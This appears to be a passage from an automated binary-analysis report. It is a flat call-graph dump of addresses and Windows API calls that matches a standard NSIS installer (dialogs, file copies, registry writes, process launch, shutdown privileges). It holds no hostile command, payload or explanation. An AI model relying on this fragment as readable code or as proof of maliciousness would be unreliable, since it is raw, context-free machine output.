3284->3287 3288 403ca8 DestroyWindow 3284->3288 3285->3284 3289 40140b 2 API calls 3286->3289 3292 403cc7 SetWindowLongW 3287->3292 3293 403cd8 3287->3293 3342 4040a2 3288->3342 3289->3277 3291 403e17 3290->3291 3291->3282 3294 403e1b SendMessageW 3291->3294 3292->3303 3297 403d81 3293->3297 3298 403ce4 GetDlgItem 3293->3298 3294->3303 3295 40140b 2 API calls 3295->3312 3296 4040a4 DestroyWindow EndDialog 3296->3342 3352 404180 3297->3352 3301 403d14 3298->3301 3302 403cf7 SendMessageW IsWindowEnabled 3298->3302 3300 4040d3 ShowWindow 3300->3303 3305 403d21 3301->3305 3306 403d68 SendMessageW 3301->3306 3307 403d34 3301->3307 3317 403d19 3301->3317 3302->3301 3302->3303 3304 406077 18 API calls 3304->3312 3305->3306 3305->3317 3306->3297 3309 403d51 3307->3309 3310 403d3c 3307->3310 3314 40140b 2 API calls 3309->3314 3313 40140b 2 API calls 3310->3313 3311 403d4f 3311->3297 3312->3295 3312->3296 3312->3303 3312->3304 3315 404119 19 API calls 3312->3315 3333 403fe4 DestroyWindow 3312->3333 3343 404119 3312->3343 3313->3317 3316 403d58 3314->3316 3315->3312 3316->3297 3316->3317 3349 4040f2 3317->3349 3319 403ecc GetDlgItem 3320 403ee1 3319->3320 3321 403ee9 ShowWindow KiUserCallbackDispatcher 3319->3321 3320->3321 3346 40413b EnableWindow 3321->3346 3323 403f13 EnableWindow 3326 403f27 3323->3326 3324 403f2c GetSystemMenu EnableMenuItem SendMessageW 3325 403f5c SendMessageW 3324->3325 3324->3326 3325->3326 3326->3324 3347 40414e SendMessageW 3326->3347 3348 406055 lstrcpynW 3326->3348 3329 403f8a lstrlenW 3330 406077 18 API calls 3329->3330 3331 403fa0 SetWindowTextW 3330->3331 3332 401389 2 API calls 3331->3332 3332->3312 3334 403ffe CreateDialogParamW 3333->3334 3333->3342 3335 404031 3334->3335 3334->3342 3336 404119 19 API calls 3335->3336 3337 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3336->3337 3338 401389 2 API calls 3337->3338 3339 404082 3338->3339 3339->3303 3340 40408a ShowWindow 3339->3340 3341 404165 SendMessageW 3340->3341 3341->3342 3342->3300 3342->3303 3344 406077 18 API calls 3343->3344 3345 404124 SetDlgItemTextW 3344->3345 3345->3319 3346->3323 3347->3326 3348->3329 3350 4040f9 3349->3350 3351 4040ff SendMessageW 3349->3351 3350->3351 3351->3311 3353 404198 GetWindowLongW 3352->3353 3363 404221 3352->3363 3354 4041a9 3353->3354 3353->3363 3355 4041b8 GetSysColor 3354->3355 3356 4041bb 3354->3356 3355->3356 3357 4041c1 SetTextColor 3356->3357 3358 4041cb SetBkMode 3356->3358 3357->3358 3359 4041e3 GetSysColor 3358->3359 3360 4041e9 3358->3360 3359->3360 3361 4041f0 SetBkColor 3360->3361 3362 4041fa 3360->3362 3361->3362 3362->3363 3364 404214 CreateBrushIndirect 3362->3364 3365 40420d DeleteObject 3362->3365 3363->3303 3364->3363 3365->3364 3366 401fc3 3367 401fd5 3366->3367 3368 402087 3366->3368 3386 402bbf 3367->3386 3370 401423 25 API calls 3368->3370 3376 4021e1 3370->3376 3372 402bbf 18 API calls 3373 401fe5 3372->3373 3374 401ffb LoadLibraryExW 3373->3374 3375 401fed GetModuleHandleW 3373->3375 3374->3368 3377 40200c 3374->3377 3375->3374 3375->3377 3392 40649a WideCharToMultiByte 3377->3392 3380 402056 3382 4051b4 25 API calls 3380->3382 3381 40201d 3384 40202d 3381->3384 3395 401423 3381->3395 3382->3384 3384->3376 3385 402079 FreeLibrary 3384->3385 3385->3376 3387 402bcb 3386->3387 3388 406077 18 API calls 3387->3388 3389 402bec 3388->3389 3390 401fdc 3389->3390 3391 4062e9 5 API calls 3389->3391 3390->3372 3391->3390 3393 4064c4 GetProcAddress 3392->3393 3394 402017 3392->3394 3393->3394 3394->3380 3394->3381 3396 4051b4 25 API calls 3395->3396 3397 401431 3396->3397 3397->3384 3794 4016c4 3795 402bbf 18 API calls 3794->3795 3796 4016ca GetFullPathNameW 3795->3796 3797 4016e4 3796->3797 3803 401706 3796->3803 3800 406398 2 API calls 3797->3800 3797->3803 3798 40171b GetShortPathNameW 3799 402a4c 3798->3799 3801 4016f6 3800->3801 3801->3803 3804 406055 lstrcpynW 3801->3804 3803->3798 3803->3799 3804->3803 3805 4014cb 3806 4051b4 25 API calls 3805->3806 3807 4014d2 3806->3807 3808 40194e 3809 402bbf 18 API calls 3808->3809 3810 401955 lstrlenW 3809->3810 3811 402531 3810->3811 3812 4027ce 3813 4027d6 3812->3813 3814 4027da FindNextFileW 3813->3814 3817 4027ec 3813->3817 3815 402833 3814->3815 3814->3817 3818 406055 lstrcpynW 3815->3818 3818->3817 3573 401754 3574 402bbf 18 API calls 3573->3574 3575 40175b 3574->3575 3576 405c59 2 API calls 3575->3576 3577 401762 3576->3577 3578 405c59 2 API calls 3577->3578 3578->3577 3819 401d56 GetDC GetDeviceCaps 3820 402ba2 18 API calls 3819->3820 3821 401d74 MulDiv ReleaseDC 3820->3821 3822 402ba2 18 API calls 3821->3822 3823 401d93 3822->3823 3824 406077 18 API calls 3823->3824 3825 401dcc CreateFontIndirectW 3824->3825 3826 402531 3825->3826 3827 401a57 3828 402ba2 18 API calls 3827->3828 3829 401a5d 3828->3829 3830 402ba2 18 API calls 3829->3830 3831 401a05 3830->3831 3832 4014d7 3833 402ba2 18 API calls 3832->3833 3834 4014dd Sleep 3833->3834 3836 402a4c 3834->3836 3837 40155b 3838 4029f2 3837->3838 3841 405f9c wsprintfW 3838->3841 3840 4029f7 3841->3840 3668 401ddc 3669 402ba2 18 API calls 3668->3669 3670 401de2 3669->3670 3671 402ba2 18 API calls 3670->3671 3672 401deb 3671->3672 3673 401df2 ShowWindow 3672->3673 3674 401dfd EnableWindow 3672->3674 3675 402a4c 3673->3675 3674->3675 3842 40385c 3843 403867 3842->3843 3844 40386e GlobalAlloc 3843->3844 3845 40386b 3843->3845 3844->3845 3697 4022df 3698 402bbf 18 API calls 3697->3698 3699 4022ee 3698->3699 3700 402bbf 18 API calls 3699->3700 3701 4022f7 3700->3701 3702 402bbf 18 API calls 3701->3702 3703 402301 GetPrivateProfileStringW 3702->3703 3704 401bdf 3705 402ba2 18 API calls 3704->3705 3706 401be6 3705->3706 3707 402ba2 18 API calls 3706->3707 3708 401bf0 3707->3708 3709 401c00 3708->3709 3710 402bbf 18 API calls 3708->3710 3711 401c10 3709->3711 3712 402bbf 18 API calls 3709->3712 3710->3709 3713 401c1b 3711->3713 3714 401c5f 3711->3714 3712->3711 3716 402ba2 18 API calls 3713->3716 3715 402bbf 18 API calls 3714->3715 3717 401c64 3715->3717 3718 401c20 3716->3718 3719 402bbf 18 API calls 3717->3719 3720 402ba2 18 API calls 3718->3720 3721 401c6d FindWindowExW 3719->3721 3722 401c29 3720->3722 3725 401c8f 3721->3725 3723 401c31 SendMessageTimeoutW 3722->3723 3724 401c4f SendMessageW 3722->3724 3723->3725 3724->3725 3846 401960 3847 402ba2 18 API calls 3846->3847 3848 401967 3847->3848 3849 402ba2 18 API calls 3848->3849 3850 401971 3849->3850 3851 402bbf 18 API calls 3850->3851 3852 40197a 3851->3852 3853 40198e lstrlenW 3852->3853 3858 4019ca 3852->3858 3854 401998 3853->3854 3854->3858 3859 406055 lstrcpynW 3854->3859 3856 4019b3 3857 4019c0 lstrlenW 3856->3857 3856->3858 3857->3858 3859->3856 3860 401662 3861 402bbf 18 API calls 3860->3861 3862 401668 3861->3862 3863 406398 2 API calls 3862->3863 3864 40166e 3863->3864 3865 4019e4 3866 402bbf 18 API calls 3865->3866 3867 4019eb 3866->3867 3868 402bbf 18 API calls 3867->3868 3869 4019f4 3868->3869 3870 4019fb lstrcmpiW 3869->3870 3871 401a0d lstrcmpW 3869->3871 3872 401a01 3870->3872 3871->3872 3873 4025e5 3874 402ba2 18 API calls 3873->3874 3882 4025f4 3874->3882 3875 40272d 3876 40263a ReadFile 3876->3875 3876->3882 3877 405cad ReadFile 3877->3882 3879 40267a MultiByteToWideChar 3879->3882 3880 40272f 3895 405f9c wsprintfW 3880->3895 3882->3875 3882->3876 3882->3877 3882->3879 3882->3880 3883 4026a0 SetFilePointer MultiByteToWideChar 3882->3883 3884 402740 3882->3884 3886 405d0b SetFilePointer 3882->3886 3883->3882 3884->3875 3885 402761 SetFilePointer 3884->3885 3885->3875 3887 405d27 3886->3887 3888 405d43 3886->3888 3889 405cad ReadFile 3887->3889 3888->3882 3890 405d33 3889->3890 3890->3888 3891 405d74 SetFilePointer 3890->3891 3892 405d4c SetFilePointer 3890->3892 3891->3888 3892->3891 3893 405d57 3892->3893 3894 405cdc WriteFile 3893->3894 3894->3888 3895->3875 3398 401e66 3399 402bbf 18 API calls 3398->3399 3400 401e6c 3399->3400 3401 4051b4 25 API calls 3400->3401 3402 401e76 3401->3402 3403 405735 2 API calls 3402->3403 3404 401e7c 3403->3404 3405 401edb CloseHandle 3404->3405 3406 401e8c WaitForSingleObject 3404->3406 3407 40281e 3404->3407 3405->3407 3408 401e9e 3406->3408 3409 401eb0 GetExitCodeProcess 3408->3409 3412 406467 2 API calls 3408->3412 3410 401ec2 3409->3410 3411 401ecf 3409->3411 3416 405f9c wsprintfW 3410->3416 3411->3405 3415 401ecd 3411->3415 3413 401ea5 WaitForSingleObject 3412->3413 3413->3408 3415->3405 3416->3415 3417 401767 3418 402bbf 18 API calls 3417->3418 3419 40176e 3418->3419 3420 401796 3419->3420 3421 40178e 3419->3421 3457 406055 lstrcpynW 3420->3457 3456 406055 lstrcpynW 3421->3456 3424 401794 3428 4062e9 5 API calls 3424->3428 3425 4017a1 3426 405a09 3 API calls 3425->3426 3427 4017a7 lstrcatW 3426->3427 3427->3424 3450 4017b3 3428->3450 3429 406398 2 API calls 3429->3450 3430 405c05 2 API calls 3430->3450 3432 4017c5 CompareFileTime 3432->3450 3433 401885 3435 4051b4 25 API calls 3433->3435 3434 40185c 3436 4051b4 25 API calls 3434->3436 3444 401871 3434->3444 3437 40188f 3435->3437 3436->3444 3438 403027 32 API calls 3437->3438 3439 4018a2 3438->3439 3440 4018b6 SetFileTime 3439->3440 3441 4018c8 CloseHandle 3439->3441 3440->3441 3443 4018d9 3441->3443 3441->3444 3442 406077 18 API calls 3442->3450 3445 4018f1 3443->3445 3446 4018de 3443->3446 3449 406077 18 API calls 3445->3449 3448 406077 18 API calls 3446->3448 3447 406055 lstrcpynW 3447->3450 3451 4018e6 lstrcatW 3448->3451 3452 4018f9 3449->3452 3450->3429 3450->3430 3450->3432 3450->3433 3450->3434 3450->3442 3450->3447 3453 40579a MessageBoxIndirectW 3450->3453 3455 405c2a GetFileAttributesW CreateFileW 3450->3455 3451->3452 3454 40579a MessageBoxIndirectW 3452->3454 3453->3450 3454->3444 3455->3450 3456->3424 3457->3425 3896 404267 lstrlenW 3897 404286 3896->3897 3898 404288 WideCharToMultiByte 3896->3898 3897->3898 3899 401ee9 3900 402bbf 18 API calls 3899->3900 3901 401ef0 3900->3901 3902 406398 2 API calls 3901->3902 3903 401ef6 3902->3903 3904 401f07 3903->3904 3906 405f9c wsprintfW 3903->3906 3906->3904 3907 4021ea 3908 402bbf 18 API calls 3907->3908 3909 4021f0 3908->3909 3910 402bbf 18 API calls 3909->3910 3911 4021f9 3910->3911 3912 402bbf 18 API calls 3911->3912 3913 402202 3912->3913 3914 406398 2 API calls 3913->3914 3915 40220b 3914->3915 3916 40221c lstrlenW lstrlenW 3915->3916 3920 40220f 3915->3920 3918 4051b4 25 API calls 3916->3918 3917 4051b4 25 API calls 3921 402217 3917->3921 3919 40225a SHFileOperationW 3918->3919 3919->3920 3919->3921 3920->3917 3920->3921 3922 40156b 3923 401584 3922->3923 3924 40157b ShowWindow 3922->3924 3925 401592 ShowWindow 3923->3925 3926 402a4c 3923->3926 3924->3923 3925->3926 3927 40456d 3928 4045a3 3927->3928 3929 40457d 3927->3929 3930 404180 8 API calls 3928->3930 3931 404119 19 API calls 3929->3931 3933 4045af 3930->3933 3932 40458a SetDlgItemTextW 3931->3932 3932->3928 3934 40226e 3935 402275 3934->3935 3937 402288 3934->3937 3936 406077 18 API calls 3935->3936 3938 402282 3936->3938 3939 40579a MessageBoxIndirectW 3938->3939 3939->3937 3940 4014f1 SetForegroundWindow 3941 402a4c 3940->3941 3942 401673 3943 402bbf 18 API calls 3942->3943 3944 40167a 3943->3944 3945 402bbf 18 API calls 3944->3945 3946 401683 3945->3946 3947 402bbf 18 API calls 3946->3947 3948 40168c MoveFileW 3947->3948 3949 40169f 3948->3949 3950 401698 3948->3950 3951 406398 2 API calls 3949->3951 3954 4021e1 3949->3954 3952 401423 25 API calls 3950->3952 3953 4016ae 3951->3953 3952->3954 3953->3954 3955 405ef6 38 API calls 3953->3955 3955->3950 3956 4052f3 3957 405314 GetDlgItem GetDlgItem GetDlgItem 3956->3957 3958 40549d 3956->3958 4001 40414e SendMessageW 3957->4001 3959 4054a6 GetDlgItem CreateThread CloseHandle 3958->3959 3963 4054ce 3958->3963 3959->3963 3961 405384 3967 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 3961->3967 3962 4054f9 3966 405559 3962->3966 3969 405533 ShowWindow 3962->3969 3970 40550d 3962->3970 3963->3962 3964 4054e5 ShowWindow ShowWindow 3963->3964 3965 40551e 3963->3965 4003 40414e SendMessageW 3964->4003 3971 404180 8 API calls 3965->3971 3966->3965 3974 405567 SendMessageW 3966->3974 3972 4053f9 3967->3972 3973 4053dd SendMessageW SendMessageW 3967->3973 3977 405553 3969->3977 3978 405545 3969->3978 3975 4040f2 SendMessageW 3970->3975 3976 40552c 3971->3976 3980 40540c 3972->3980 3981 4053fe SendMessageW 3972->3981 3973->3972 3974->3976 3982 405580 CreatePopupMenu 3974->3982 3975->3965 3979 4040f2 SendMessageW 3977->3979 3983 4051b4 25 API calls 3978->3983 3979->3966 3985 404119 19 API calls 3980->3985 3981->3980 3984 406077 18 API calls 3982->3984 3983->3977 3986 405590 AppendMenuW 3984->3986 3987 40541c 3985->3987 3988 4055c0 TrackPopupMenu 3986->3988 3989 4055ad GetWindowRect 3986->3989 3990 405425 ShowWindow 3987->3990 3991 405459 GetDlgItem SendMessageW 3987->3991 3988->3976 3992 4055db 3988->3992 3989->3988 3993 405448 3990->3993 3994 40543b ShowWindow 3990->3994 3991->3976 3995 405480 SendMessageW SendMessageW 3991->3995 3996 4055f7 SendMessageW 3992->3996 4002 40414e SendMessageW 3993->4002 3994->3993 3995->3976 3996->3996 3997 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3996->3997 3999 405639 SendMessageW 3997->3999 3999->3999 4000 405662 GlobalUnlock SetClipboardData CloseClipboard 3999->4000 4000->3976 4001->3961 4002->3991 4003->3962 4004 401cfa GetDlgItem GetClientRect 4005 402bbf 18 API calls 4004->4005 4006 401d2c LoadImageW SendMessageW 4005->4006 4007 401d4a DeleteObject 4006->4007 4008 402a4c 4006->4008 4007->4008 3644 40237b 3645 402381 3644->3645 3646 402bbf 18 API calls 3645->3646 3647 402393 3646->3647 3648 402bbf 18 API calls 3647->3648 3649 40239d RegCreateKeyExW 3648->3649 3650 4023c7 3649->3650 3651 402a4c 3649->3651 3652 4023e2 3650->3652 3653 402bbf 18 API calls 3650->3653 3654 4023ee 3652->3654 3661 402ba2 3652->3661 3655 4023d8 lstrlenW 3653->3655 3657 402409 RegSetValueExW 3654->3657 3658 403027 32 API calls 3654->3658 3655->3652 3659 40241f RegCloseKey 3657->3659 3658->3657 3659->3651 3662 406077 18 API calls 3661->3662 3663 402bb6 3662->3663 3663->3654 4009 4027fb 4010 402bbf 18 API calls 4009->4010 4011 402802 FindFirstFileW 4010->4011 4012 40282a 4011->4012 4016 402815 4011->4016 4014 402833 4012->4014 4017 405f9c wsprintfW 4012->4017 4018 406055 lstrcpynW 4014->4018 4017->4014 4018->4016 4019 4014ff 4020 401507 4019->4020 4022 40151a 4019->4022 4021 402ba2 18 API calls 4020->4021 4021->4022 4023 401000 4024 401037 BeginPaint GetClientRect 4023->4024 4025 40100c DefWindowProcW 4023->4025 4026 4010f3 4024->4026 4030 401179 4025->4030 4028 401073 CreateBrushIndirect FillRect DeleteObject 4026->4028 4029 4010fc 4026->4029 4028->4026 4031 401102 CreateFontIndirectW 4029->4031 4032 401167 EndPaint 4029->4032 4031->4032 4033 401112 6 API calls 4031->4033 4032->4030 4033->4032 4034 401904 4035 40193b 4034->4035 4036 402bbf 18 API calls 4035->4036 4037 401940 4036->4037 4038 405846 69 API calls 4037->4038 4039 401949 4038->4039 4040 402d04 4041 402d16 SetTimer 4040->4041 4042 402d2f 4040->4042 4041->4042 4043 402d84 4042->4043 4044 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4042->4044 4044->4043 4045 402786 4046 40278d 4045->4046 4052 4029f7 4045->4052 4047 402ba2 18 API calls 4046->4047 4048 402798 4047->4048 4049 40279f SetFilePointer 4048->4049 4050 4027af 4049->4050 4049->4052 4053 405f9c wsprintfW 4050->4053 4053->4052 4054 401907 4055 402bbf 18 API calls 4054->4055 4056 40190e 4055->4056 4057 40579a MessageBoxIndirectW 4056->4057 4058 401917 4057->4058 4059 401e08 4060 402bbf 18 API calls 4059->4060 4061 401e0e 4060->4061 4062 402bbf 18 API calls 4061->4062 4063 401e17 4062->4063 4064 402bbf 18 API calls 4063->4064 4065 401e20 4064->4065 4066 402bbf 18 API calls 4065->4066 4067 401e29 4066->4067 4068 401423 25 API calls 4067->4068 4069 401e30 ShellExecuteW 4068->4069 4070 401e61 4069->4070 4076 40490a 4077 404936 4076->4077 4078 40491a 4076->4078 4080 404969 4077->4080 4081 40493c SHGetPathFromIDListW 4077->4081 4087 40577e GetDlgItemTextW 4078->4087 4083 404953 SendMessageW 4081->4083 4084 40494c 4081->4084 4082 404927 SendMessageW 4082->4077 4083->4080 4086 40140b 2 API calls 4084->4086 4086->4083 4087->4082 3579 402095 3580 402bbf 18 API calls 3579->3580 3581 40209c 3580->3581 3582 402bbf 18 API calls 3581->3582 3583 4020a6 3582->3583 3584 402bbf 18 API calls 3583->3584 3585 4020b0 3584->3585 3586 402bbf 18 API calls 3585->3586 3587 4020ba 3586->3587 3588 402bbf 18 API calls 3587->3588 3589 4020c4 3588->3589 3590 402103 CoCreateInstance 3589->3590 3591 402bbf 18 API calls 3589->3591 3594 402122 3590->3594 3591->3590 3592 401423 25 API calls 3593 4021e1 3592->3593 3594->3592 3594->3593 4088 401a15 4089 402bbf 18 API calls 4088->4089 4090 401a1e ExpandEnvironmentStringsW 4089->4090 4091 401a32 4090->4091 4093 401a45 4090->4093 4092 401a37 lstrcmpW 4091->4092 4091->4093 4092->4093 4094 402515 4095 402bbf 18 API calls 4094->4095 4096 40251c 4095->4096 4099 405c2a GetFileAttributesW CreateFileW 4096->4099 4098 402528 4099->4098 4100 401b16 4101 402bbf 18 API calls 4100->4101 4102 401b1d 4101->4102 4103 402ba2 18 API calls 4102->4103 4104 401b26 wsprintfW 4103->4104 4105 402a4c 4104->4105 3664 40159b 3665 402bbf 18 API calls 3664->3665 3666 4015a2 SetFileAttributesW 3665->3666 3667 4015b4 3666->3667 3676 40229d 3677 4022a5 3676->3677 3678 4022ab 3676->3678 3679 402bbf 18 API calls 3677->3679 3680 4022b9 3678->3680 3681 402bbf 18 API calls 3678->3681 3679->3678 3682 4022c7 3680->3682 3683 402bbf 18 API calls 3680->3683 3681->3680 3684 402bbf 18 API calls 3682->3684 3683->3682 3685 4022d0 WritePrivateProfileStringW 3684->3685 4106 401f1d 4107 402bbf 18 API calls 4106->4107 4108 401f24 4107->4108 4109 40642b 5 API calls 4108->4109 4110 401f33 4109->4110 4111 401f4f GlobalAlloc 4110->4111 4114 401fb7 4110->4114 4112 401f63 4111->4112 4111->4114 4113 40642b 5 API calls 4112->4113 4115 401f6a 4113->4115 4116 40642b 5 API calls 4115->4116 4117 401f74 4116->4117 4117->4114 4121 405f9c wsprintfW 4117->4121 4119 401fa9 4122 405f9c wsprintfW 4119->4122 4121->4119 4122->4114 3686 40249e 3687 402cc9 19 API calls 3686->3687 3688 4024a8 3687->3688 3689 402ba2 18 API calls 3688->3689 3690 4024b1 3689->3690 3691 4024bc 3690->3691 3694 40281e 3690->3694 3692 4024d5 RegEnumValueW 3691->3692 3693 4024c9 RegEnumKeyW 3691->3693 3692->3694 3695 4024ee RegCloseKey 3692->3695 3693->3695 3695->3694 4123 40149e 4124 402288 4123->4124 4125 4014ac PostQuitMessage 4123->4125 4125->4124 3726 40231f 3727 402324 3726->3727 3728 40234f 3726->3728 3729 402cc9 19 API calls 3727->3729 3730 402bbf 18 API calls 3728->3730 3731 40232b 3729->3731 3732 402356 3730->3732 3733 402335 3731->3733 3737 40236c 3731->3737 3738 402bff RegOpenKeyExW 3732->3738 3734 402bbf 18 API calls 3733->3734 3735 40233c RegDeleteValueW RegCloseKey 3734->3735 3735->3737 3739 402c93 3738->3739 3742 402c2a 3738->3742 3739->3737 3740 402c50 RegEnumKeyW 3741 402c62 RegCloseKey 3740->3741 3740->3742 3744 40642b 5 API calls 3741->3744 3742->3740 3742->3741 3743 402c87 RegCloseKey 3742->3743 3745 402bff 5 API calls 3742->3745 3747 402c76 3743->3747 3746 402c72 3744->3746 3745->3742 3746->3747 3748 402ca2 RegDeleteKeyW 3746->3748 3747->3739 3748->3747 2791 4032a0 SetErrorMode GetVersion 2792 4032d4 2791->2792 2793 4032da 2791->2793 2794 40642b 5 API calls 2792->2794 2882 4063bf GetSystemDirectoryW 2793->2882 2794->2793 2796 4032f1 2797 4063bf 3 API calls 2796->2797 2798 4032fb 2797->2798 2799 4063bf 3 API calls 2798->2799 2800 403305 2799->2800 2885 40642b GetModuleHandleA 2800->2885 2803 40642b 5 API calls 2804 403313 #17 OleInitialize SHGetFileInfoW 2803->2804 2891 406055 lstrcpynW 2804->2891 2806 403350 GetCommandLineW 2892 406055 lstrcpynW 2806->2892 2808 403362 GetModuleHandleW 2809 40337a 2808->2809 2893 405a36 2809->2893 2812 4034b4 GetTempPathW 2897 40326f 2812->2897 2814 4034cc 2815 4034d0 GetWindowsDirectoryW lstrcatW 2814->2815 2816 403526 DeleteFileW 2814->2816 2819 40326f 12 API calls 2815->2819 2907 402dee GetTickCount GetModuleFileNameW 2816->2907 2818 4033a2 2820 405a36 CharNextW 2818->2820 2824 40349d 2818->2824 2826 40349f 2818->2826 2822 4034ec 2819->2822 2820->2818 2821 40353a 2828 405a36 CharNextW 2821->2828 2864 4035dd 2821->2864 2877 4035ed 2821->2877 2822->2816 2823 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2822->2823 2827 40326f 12 API calls 2823->2827 2824->2812 2991 406055 lstrcpynW 2826->2991 2832 40351e 2827->2832 2833 403559 2828->2833 2832->2816 2832->2877 2842 4035b7 2833->2842 2843 40361e 2833->2843 2834 403728 2836 403730 GetCurrentProcess OpenProcessToken 2834->2836 2837 4037ac ExitProcess 2834->2837 2835 403608 3015 40579a 2835->3015 2839 403748 LookupPrivilegeValueW AdjustTokenPrivileges 2836->2839 2840 40377c 2836->2840 2839->2840 2845 40642b 5 API calls 2840->2845 2992 405b11 2842->2992 3019 40571d 2843->3019 2849 403783 2845->2849 2853 403798 ExitWindowsEx 2849->2853 2856 4037a5 2849->2856 2851 403634 lstrcatW 2852 40363f lstrcatW lstrcmpiW 2851->2852 2855 40365b 2852->2855 2852->2877 2853->2837 2853->2856 2858 403660 2855->2858 2859 403667 2855->2859 3057 40140b 2856->3057 2857 4035d2 3007 406055 lstrcpynW 2857->3007 3022 405683 CreateDirectoryW 2858->3022 3027 405700 CreateDirectoryW 2859->3027 2935 40389e 2864->2935 2866 40366c SetCurrentDirectoryW 2867 403687 2866->2867 2868 40367c 2866->2868 3031 406055 lstrcpynW 2867->3031 3030 406055 lstrcpynW 2868->3030 2873 4036d3 CopyFileW 2879 403695 2873->2879 2874 40371c 2876 405ef6 38 API calls 2874->2876 2876->2877 3008 4037c4 2877->3008 2878 406077 18 API calls 2878->2879 2879->2874 2879->2878 2881 403707 CloseHandle 2879->2881 3032 406077 2879->3032 3050 405ef6 MoveFileExW 2879->3050 3054 405735 CreateProcessW 2879->3054 2881->2879 2883 4063e1 wsprintfW LoadLibraryW 2882->2883 2883->2796 2886 406451 GetProcAddress 2885->2886 2887 406447 2885->2887 2889 40330c 2886->2889 2888 4063bf 3 API calls 2887->2888 2890 40644d 2888->2890 2889->2803 2890->2886 2890->2889 2891->2806 2892->2808 2894 405a3c 2893->2894 2895 403389 CharNextW 2894->2895 2896 405a43 CharNextW 2894->2896 2895->2812 2895->2818 2896->2894 3060 4062e9 2897->3060 2899 403285 2899->2814 2900 40327b 2900->2899 3069 405a09 lstrlenW CharPrevW 2900->3069 2903 405700 2 API calls 2904 403293 2903->2904 3072 405c59 2904->3072 3076 405c2a GetFileAttributesW CreateFileW 2907->3076 2909 402e2e 2934 402e3e 2909->2934 3077 406055 lstrcpynW 2909->3077 2911 402e54 3078 405a55 lstrlenW 2911->3078 2915 402e65 GetFileSize 2916 402f61 2915->2916 2933 402e7c 2915->2933 3083 402d8a 2916->3083 2918 402f6a 2920 402f9a GlobalAlloc 2918->2920 2918->2934 3118 403258 SetFilePointer 2918->3118 3094 403258 SetFilePointer 2920->3094 2922 402fcd 2924 402d8a 6 API calls 2922->2924 2924->2934 2925 402f83 2928 403242 ReadFile 2925->2928 2926 402fb5 3095 403027 2926->3095 2929 402f8e 2928->2929 2929->2920 2929->2934 2930 402d8a 6 API calls 2930->2933 2931 402fc1 2931->2931 2932 402ffe SetFilePointer 2931->2932 2931->2934 2932->2934 2933->2916 2933->2922 2933->2930 2933->2934 3115 403242 2933->3115 2934->2821 2936 40642b 5 API calls 2935->2936 2937 4038b2 2936->2937 2938 4038b8 GetUserDefaultUILanguage 2937->2938 2939 4038ca 2937->2939 3139 405f9c wsprintfW 2938->3139 3149 405f22 RegOpenKeyExW 2939->3149 2942 4038c8 3140 403b74 2942->3140 2944 403919 lstrcatW 2944->2942 2945 405f22 3 API calls 2945->2944 2948 405b11 18 API calls 2949 40394b 2948->2949 2950 4039df 2949->2950 2952 405f22 3 API calls 2949->2952 2951 405b11 18 API calls 2950->2951 2953 4039e5 2951->2953 2954 40397d 2952->2954 2955 4039f5 LoadImageW 2953->2955 2956 406077 18 API calls 2953->2956 2954->2950 2959 40399e lstrlenW 2954->2959 2963 405a36 CharNextW 2954->2963 2957 403a9b 2955->2957 2958 403a1c RegisterClassW 2955->2958 2956->2955 2962 40140b 2 API calls 2957->2962 2960 403a52 SystemParametersInfoW CreateWindowExW 2958->2960 2961 403aa5 2958->2961 2964 4039d2 2959->2964 2965 4039ac lstrcmpiW 2959->2965 2960->2957 2961->2877 2966 403aa1 2962->2966 2968 40399b 2963->2968 2967 405a09 3 API calls 2964->2967 2965->2964 2969 4039bc GetFileAttributesW 2965->2969 2966->2961 2970 403b74 19 API calls 2966->2970 2971 4039d8 2967->2971 2968->2959 2972 4039c8 2969->2972 2974 403ab2 2970->2974 3154 406055 lstrcpynW 2971->3154 2972->2964 2973 405a55 2 API calls 2972->2973 2973->2964 2976 403b41 2974->2976 2977 403abe ShowWindow 2974->2977 3155 405287 OleInitialize 2976->3155 2979 4063bf 3 API calls 2977->2979 2981 403ad6 2979->2981 2980 403b47 2982 403b63 2980->2982 2983 403b4b 2980->2983 2984 403ae4 GetClassInfoW 2981->2984 2986 4063bf 3 API calls 2981->2986 2985 40140b 2 API calls 2982->2985 2983->2961 2989 40140b 2 API calls 2983->2989 2987 403af8 GetClassInfoW RegisterClassW 2984->2987 2988 403b0e DialogBoxParamW 2984->2988 2985->2961 2986->2984 2987->2988 2990 40140b 2 API calls 2988->2990 2989->2961 2990->2961 2991->2824 3170 406055 lstrcpynW 2992->3170 2994 405b22 3171 405ab4 CharNextW CharNextW 2994->3171 2997 4035c3 2997->2877 3006 406055 lstrcpynW 2997->3006 2998 4062e9 5 API calls 3004 405b38 2998->3004 2999 405b69 lstrlenW 3000 405b74 2999->3000 2999->3004 3002 405a09 3 API calls 3000->3002 3003 405b79 GetFileAttributesW 3002->3003 3003->2997 3004->2997 3004->2999 3005 405a55 2 API calls 3004->3005 3177 406398 FindFirstFileW 3004->3177 3005->2999 3006->2857 3007->2864 3009 4037dc 3008->3009 3010 4037ce CloseHandle 3008->3010 3180 403809 3009->3180 3010->3009 3016 4057af 3015->3016 3017 403616 ExitProcess 3016->3017 3018 4057c3 MessageBoxIndirectW 3016->3018 3018->3017 3020 40642b 5 API calls 3019->3020 3021 403623 lstrcatW 3020->3021 3021->2851 3021->2852 3023 403665 3022->3023 3024 4056d4 GetLastError 3022->3024 3023->2866 3024->3023 3025 4056e3 SetFileSecurityW 3024->3025 3025->3023 3026 4056f9 GetLastError 3025->3026 3026->3023 3028 405714 GetLastError 3027->3028 3029 405710 3027->3029 3028->3029 3029->2866 3030->2867 3031->2879 3033 406084 3032->3033 3034 4062cf 3033->3034 3037 406137 GetVersion 3033->3037 3038 40629d lstrlenW 3033->3038 3040 406077 10 API calls 3033->3040 3042 405f22 3 API calls 3033->3042 3043 4061b2 GetSystemDirectoryW 3033->3043 3044 4061c5 GetWindowsDirectoryW 3033->3044 3045 4062e9 5 API calls 3033->3045 3046 406077 10 API calls 3033->3046 3047 40623e lstrcatW 3033->3047 3048 4061f9 SHGetSpecialFolderLocation 3033->3048 3236 405f9c wsprintfW 3033->3236 3237 406055 lstrcpynW 3033->3237 3035 4036c6 DeleteFileW 3034->3035 3238 406055 lstrcpynW 3034->3238 3035->2873 3035->2879 3037->3033 3038->3033 3040->3038 3042->3033 3043->3033 3044->3033 3045->3033 3046->3033 